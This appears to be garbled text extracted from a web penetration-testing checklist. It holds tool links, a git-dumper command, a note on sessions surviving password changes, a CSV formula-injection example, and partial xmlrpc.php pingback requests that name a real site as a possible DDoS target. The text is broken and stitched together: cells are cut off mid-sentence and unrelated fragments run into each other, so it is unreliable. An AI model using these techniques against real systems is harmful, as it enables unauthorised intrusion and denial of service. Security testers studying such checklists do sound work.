https://www.smartconversion.com/unit_conversion/IP_Address_Converter.aspx

https://github.com/neex

https://github.com/arthaud/git-dumper

python3 git-dumper.py $name /root/Desktop/tools/web/git-dumper/output

Manual

Manual
Manual

Manual
BurpSuite
Burpsuite
Manual

Burpsuite
Manual
Manual
Manual
Manual
Manual
Manual
Manual
Manual

Manual

Manual

Manual

https://github.com/vsec7/BurpSuite-Xkeys

https://github.com/1ndianl33t/Gf-Patterns/
cat list_target.txt | jaeles scan -c 100 -s <signature>
https://github.com/devanshbatham/FavFreak
https://github.com/hisxo/gitGraber
https://github.com/s0md3v/Arjun
https://github.com/jhaddix/
Remarks
Old link becomes valid as if date and
time parameter's value are changed to
fresh one = Date time link is not user
dependent and therefore valid across
all users
account.. after knowing that your ID has
been compromised what you'll do ?
i guess first thing that will popup into
your head is, "I should change my
password!" and you'll change the
password.. maximum users just change
his/her password when they recover
their ID.
in C2FO, changing the password
doesn't destroys the other sessions
which are logged in with old passwords.
As other sessions is not destroyed,
attacker will be still logged in your
account even after changing password,
cause his session is still active.. he'll
have complete access on your account
till that session expires!
So, your account remains insecure
even after the changing of password.
PATCH

When some change his/her password,

each and every active sessions that
belongs to that particular account must
be destroyed!
I would recommend you to follow
Facebook on this security issue.. They
fixed this issue few months back by
adding a process that asks users
whether user want to close all open
sessions or not right after changing
password.

So there is two way, either you let

users to choose if they want to keep
active sessions or just destroy every
These are general test cases by
considering any product purchase web
application. However test cases varies
from application to application. By
analyzing request parameters these
test cases can be exapanded in future.
Resources for chintan
1. Follow this guy -
https://twitter.com/soaj1664ashar
2. View Slide -
http://slides.com/mscasharjaved/on-
breaking-php-based-cross-site-scripting-
protections-in-the-wild#/
3. View the video related to above slide
- https://www.youtube.com/watch?
v=TKn5qdti66c
http://oldmanlab.blogspot.in/2012/03/sqlmap-tutorial-you-are-just.html
Refer below PDF
1.
http://www.onapsis.com/slides/ONAPSIS
-Penetration_Testing_SAP.pdf
2.
https://www.blackhat.com/presentation
s/bh-europe-09/DiCroce/BlackHat-
Europe-2009-DiCroce-CYBSEC-
Publication-SAP-Penetration-Testing-
slides.pdf
3.
http://information.rapid7.com/rs/rapid7/i
mages/SAP%20Penetration%20Testing
%20Using%20Metasploit%20Final.pdf
If it is so, attacker can download all 100
200 images and can know their
induvidual's value. Then attacker can
write a small program to bruteforce it.

We can inject commands in any fields

of a member in an email group (=2*10
for example), and when it's exported to
CSV it will be evaluated to 20 in the
corresponding cell, this enables an
attacker to spread malware and
execute system level commands on a
victim's machine if the victim
downloaded the CSV file.
<methodName>demo.sayHello</meth
odName>
<params>
<param>
<value>admin</value>
</param>
</params>
</methodCall>

Notice that a successful response is

received showing that the xmlrpc.php
file is enabled.

Now, considering the blog post

https://withinsecurity.com/2015/10/is-
there-really-a-cybersecurity-skills-gap/
on the withinsecurity.com domain, the
xmlrpc.php file discussed above could
potentially be abused to cause a DDOS
attack against a victim host. This is
achieved by simply sending a request
that looks like below. See Screenshot 2:

POST /xmlrpc.php HTTP/1.1

Host: withinsecurity.com
Connection: keep-alive
Content-Length: 293

<methodCall>

<methodName>pingback.ping</metho
dName>
<params>
<param>

https://hackerone.com/reports/90131

https://www.owasp.org/index.php/CSV_
Excel_Macro_Injection
https://medium.com/bugbountywriteup/from-security-misconfiguration-to-gaining-access-of-smtp-server-ed833e757e6e

SAML Decoder -
https://www.samltool.com/decode.php

https://apapedulimu.click/clickjacking-on-google-myaccount-worth-7500/

https://medium.com/bugbountywriteup/how-i-earned-5040-from-twitter-by-showing-a-way-to-harvest-other-users-ip-address-e9f

https://medium.com/@kunal94/imagemagick-gif-coder-vulnerability-leads-to-memory-disclosure-hackerone-e9975a6a560e

Xxe in bol.com